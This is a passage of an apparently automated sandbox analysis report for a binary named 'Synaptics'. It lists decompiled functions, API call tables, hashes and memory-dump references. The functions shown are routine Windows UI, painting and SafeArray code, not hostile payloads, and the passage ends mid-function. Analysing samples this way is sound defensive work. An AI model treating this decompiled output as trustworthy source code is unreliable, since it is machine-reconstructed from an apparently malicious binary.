                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 00421B1F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 1797888035-2364942553
                                                                                                                                                                                          • Opcode ID: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                          • Instruction ID: 91e307cc55c87a5a0c16dfebb803382d4aeb1f0bf0ecfaa787b9004bec19efa9
                                                                                                                                                                                          • Opcode Fuzzy Hash: b82a38332b8dd9ed48064de1bb5f76a85686ae63693f17ffa026617879459f65
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A11E130B043202BC610FAB99CC6F5E73D8AF65754F508A2AF254E72E1E679E804835A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00458714 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00458714(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				_t1 = _t19 + 0x44; // 0x0
				if(__edx ==  *_t1) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004586EC(_t19, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004079D0(SendMessageA(_t27, 0x84, 0, E00407A64(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}












                                                                                                                                                                                          0x00458714
                                                                                                                                                                                          0x00458714
                                                                                                                                                                                          0x00458718
                                                                                                                                                                                          0x0045871b
                                                                                                                                                                                          0x0045871d
                                                                                                                                                                                          0x0045871f
                                                                                                                                                                                          0x00458723
                                                                                                                                                                                          0x00458798
                                                                                                                                                                                          0x00458798
                                                                                                                                                                                          0x00458725
                                                                                                                                                                                          0x00458725
                                                                                                                                                                                          0x0045872c
                                                                                                                                                                                          0x00458788
                                                                                                                                                                                          0x00458793
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045872e
                                                                                                                                                                                          0x0045872f
                                                                                                                                                                                          0x00458734
                                                                                                                                                                                          0x00458741
                                                                                                                                                                                          0x00458745
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00458747
                                                                                                                                                                                          0x0045874a
                                                                                                                                                                                          0x00458758
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045875a
                                                                                                                                                                                          0x00458781
                                                                                                                                                                                          0x00458781
                                                                                                                                                                                          0x00458758
                                                                                                                                                                                          0x00458745
                                                                                                                                                                                          0x0045872c
                                                                                                                                                                                          0x004587a1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCursorPos.USER32 ref: 0045872F
                                                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 0045873C
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045874A
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00458751
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045876A
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00458781
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00458793
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1770779139-0
                                                                                                                                                                                          • Opcode ID: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                          • Instruction ID: 0e129d7b8b93cd0c48e49d674e41586019fec875b1cb266d62cfcabba037c031
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6131d98ef82387943452fed01ddfa8e7454534d6ded7eca32afc254d13770e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D501AC2660830425E62036754C87F7F2558DF85B65F14453FBA04762C3ED3DAC05936E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00454268 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00454268(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t148 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t127 = __ebx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x454436);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0043AAC0(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E004398B8( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E0043F3B8(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x454444);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E00425610( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E00425610( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E004541DC(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E00454704(_v8) == 0 || E00454228(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E0045152C( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E004541DC(_t150);
							} else {
								E004541DC(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                                                                                                                                                                                          0x00454268
                                                                                                                                                                                          0x00454268
                                                                                                                                                                                          0x00454268
                                                                                                                                                                                          0x00454268
                                                                                                                                                                                          0x00454269
                                                                                                                                                                                          0x0045426b
                                                                                                                                                                                          0x0045426e
                                                                                                                                                                                          0x00454271
                                                                                                                                                                                          0x00454279
                                                                                                                                                                                          0x0045427c
                                                                                                                                                                                          0x0045438c
                                                                                                                                                                                          0x00454393
                                                                                                                                                                                          0x004543ab
                                                                                                                                                                                          0x004543ab
                                                                                                                                                                                          0x004543b0
                                                                                                                                                                                          0x004543b1
                                                                                                                                                                                          0x004543b6
                                                                                                                                                                                          0x004543b9
                                                                                                                                                                                          0x004543c0
                                                                                                                                                                                          0x004543d0
                                                                                                                                                                                          0x004543de
                                                                                                                                                                                          0x004543e6
                                                                                                                                                                                          0x004543ec
                                                                                                                                                                                          0x004543ff
                                                                                                                                                                                          0x004543ff
                                                                                                                                                                                          0x0045440a
                                                                                                                                                                                          0x00454411
                                                                                                                                                                                          0x00454414
                                                                                                                                                                                          0x00454417
                                                                                                                                                                                          0x00454420
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454430
                                                                                                                                                                                          0x00454435
                                                                                                                                                                                          0x00454282
                                                                                                                                                                                          0x00454282
                                                                                                                                                                                          0x00454285
                                                                                                                                                                                          0x004542c5
                                                                                                                                                                                          0x004542d3
                                                                                                                                                                                          0x004542e1
                                                                                                                                                                                          0x004542f0
                                                                                                                                                                                          0x0045430c
                                                                                                                                                                                          0x0045432b
                                                                                                                                                                                          0x0045432b
                                                                                                                                                                                          0x00454330
                                                                                                                                                                                          0x00454333
                                                                                                                                                                                          0x00454287
                                                                                                                                                                                          0x00454287
                                                                                                                                                                                          0x0045428a
                                                                                                                                                                                          0x00454340
                                                                                                                                                                                          0x00454346
                                                                                                                                                                                          0x00454350
                                                                                                                                                                                          0x00454360
                                                                                                                                                                                          0x00454371
                                                                                                                                                                                          0x0045436d
                                                                                                                                                                                          0x0045436d
                                                                                                                                                                                          0x0045436d
                                                                                                                                                                                          0x0045437c
                                                                                                                                                                                          0x0045437c
                                                                                                                                                                                          0x00454290
                                                                                                                                                                                          0x00454293
                                                                                                                                                                                          0x0045443e
                                                                                                                                                                                          0x00454299
                                                                                                                                                                                          0x0045429a
                                                                                                                                                                                          0x004542a0
                                                                                                                                                                                          0x004542a7
                                                                                                                                                                                          0x004542ad
                                                                                                                                                                                          0x004542b0
                                                                                                                                                                                          0x004542b0
                                                                                                                                                                                          0x004542a7
                                                                                                                                                                                          0x00454293
                                                                                                                                                                                          0x0045428a
                                                                                                                                                                                          0x00454447
                                                                                                                                                                                          0x00454447

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 901200654-0
                                                                                                                                                                                          • Opcode ID: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                          • Instruction ID: 131b90634cb33abbaab8d9433d3d521d828b3d7b247f4d7e968007ff8c91c40e
                                                                                                                                                                                          • Opcode Fuzzy Hash: db1127329ec35ba9265e92a3e95e97328d9cbd62d8671ac9278e586872d5c922
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4651F075E04108EFCB00DB99C549E9DB7F8AB49319F5485A6E808EB352D738AE85DB08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                                                                                                                                          0x00410b94
                                                                                                                                                                                          0x00410ba0
                                                                                                                                                                                          0x00410ba6
                                                                                                                                                                                          0x00410ba8
                                                                                                                                                                                          0x00410bb2
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bb9
                                                                                                                                                                                          0x00410bbe
                                                                                                                                                                                          0x00410bcc
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4c
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410bd2
                                                                                                                                                                                          0x00410bd5
                                                                                                                                                                                          0x00410be7
                                                                                                                                                                                          0x00410bd7
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410bdc
                                                                                                                                                                                          0x00410bf6
                                                                                                                                                                                          0x00410c02
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c72
                                                                                                                                                                                          0x00410c78
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c7f
                                                                                                                                                                                          0x00410c80
                                                                                                                                                                                          0x00410c82
                                                                                                                                                                                          0x00410c87
                                                                                                                                                                                          0x00410c8b
                                                                                                                                                                                          0x00410c8d
                                                                                                                                                                                          0x00410c8d
                                                                                                                                                                                          0x00410c98
                                                                                                                                                                                          0x00410ca3
                                                                                                                                                                                          0x00410cae
                                                                                                                                                                                          0x00410cb7
                                                                                                                                                                                          0x00410cba
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00410cdd
                                                                                                                                                                                          0x00410ce8
                                                                                                                                                                                          0x00410cff
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d1d
                                                                                                                                                                                          0x00410d30
                                                                                                                                                                                          0x00410d30
                                                                                                                                                                                          0x00410d39
                                                                                                                                                                                          0x00410cbc
                                                                                                                                                                                          0x00410cbc
                                                                                                                                                                                          0x00410cbd
                                                                                                                                                                                          0x00410cc3
                                                                                                                                                                                          0x00410cc9
                                                                                                                                                                                          0x00410ccb
                                                                                                                                                                                          0x00410ccd
                                                                                                                                                                                          0x00410cd0
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410cd6
                                                                                                                                                                                          0x00410c07
                                                                                                                                                                                          0x00410c07
                                                                                                                                                                                          0x00410c08
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c12
                                                                                                                                                                                          0x00410c21
                                                                                                                                                                                          0x00410c22
                                                                                                                                                                                          0x00410c2c
                                                                                                                                                                                          0x00410c2d
                                                                                                                                                                                          0x00410c32
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c3e
                                                                                                                                                                                          0x00410c48
                                                                                                                                                                                          0x00410c49
                                                                                                                                                                                          0x00410c4e
                                                                                                                                                                                          0x00410c69
                                                                                                                                                                                          0x00410c6b
                                                                                                                                                                                          0x00410c6c
                                                                                                                                                                                          0x00410c6f
                                                                                                                                                                                          0x00410c6f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c05

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00410C2D
                                                                                                                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00410C49
                                                                                                                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00410C82
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00410CFF
                                                                                                                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00410D18
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 00410D4D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 351091851-0
                                                                                                                                                                                          • Opcode ID: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                          • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 14f4beccdf032895d207be0bfe30ce8f9fbf525a3445cc88d482939134e69fdd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00426AA0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408D24(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00407638();
				_v44 = _t36;
				if(_v44 == 0) {
					E00425F64(_t51);
				}
				_push(_t68);
				_push(0x426b89);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00407380();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00407380();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x426b90);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407888();
				return _t43;
			}






















                                                                                                                                                                                          0x00426aa1
                                                                                                                                                                                          0x00426aa3
                                                                                                                                                                                          0x00426aa9
                                                                                                                                                                                          0x00426aac
                                                                                                                                                                                          0x00426aaf
                                                                                                                                                                                          0x00426ab2
                                                                                                                                                                                          0x00426abb
                                                                                                                                                                                          0x00426ac6
                                                                                                                                                                                          0x00426ad4
                                                                                                                                                                                          0x00426ada
                                                                                                                                                                                          0x00426ae2
                                                                                                                                                                                          0x00426aea
                                                                                                                                                                                          0x00426b07
                                                                                                                                                                                          0x00426b0c
                                                                                                                                                                                          0x00426b11
                                                                                                                                                                                          0x00426aec
                                                                                                                                                                                          0x00426af6
                                                                                                                                                                                          0x00426afa
                                                                                                                                                                                          0x00426b02
                                                                                                                                                                                          0x00426b02
                                                                                                                                                                                          0x00426b14
                                                                                                                                                                                          0x00426b16
                                                                                                                                                                                          0x00426b1b
                                                                                                                                                                                          0x00426b22
                                                                                                                                                                                          0x00426b24
                                                                                                                                                                                          0x00426b24
                                                                                                                                                                                          0x00426b2b
                                                                                                                                                                                          0x00426b2c
                                                                                                                                                                                          0x00426b31
                                                                                                                                                                                          0x00426b34
                                                                                                                                                                                          0x00426b37
                                                                                                                                                                                          0x00426b39
                                                                                                                                                                                          0x00426b3c
                                                                                                                                                                                          0x00426b3d
                                                                                                                                                                                          0x00426b44
                                                                                                                                                                                          0x00426b46
                                                                                                                                                                                          0x00426b49
                                                                                                                                                                                          0x00426b4a
                                                                                                                                                                                          0x00426b53
                                                                                                                                                                                          0x00426b59
                                                                                                                                                                                          0x00426b6b
                                                                                                                                                                                          0x00426b6d
                                                                                                                                                                                          0x00426b5b
                                                                                                                                                                                          0x00426b5b
                                                                                                                                                                                          0x00426b5b
                                                                                                                                                                                          0x00426b72
                                                                                                                                                                                          0x00426b75
                                                                                                                                                                                          0x00426b78
                                                                                                                                                                                          0x00426b7d
                                                                                                                                                                                          0x00426b80
                                                                                                                                                                                          0x00426b81
                                                                                                                                                                                          0x00426b83
                                                                                                                                                                                          0x00426b88

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00426AEE
                                                                                                                                                                                          • GetSystemMetrics.USER32 ref: 00426AFA
                                                                                                                                                                                          • 73CCAC50.USER32(00000000), ref: 00426B16
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem$B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3145338429-0
                                                                                                                                                                                          • Opcode ID: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                          • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b8f12cb14df9c6b7d791b8965e30f23c1242ed487bcd29c7da48a76f1dd96f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00426F10 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00426DC0(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x426fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x426fb4);
				if(_v12 != 0) {
					_push(0);
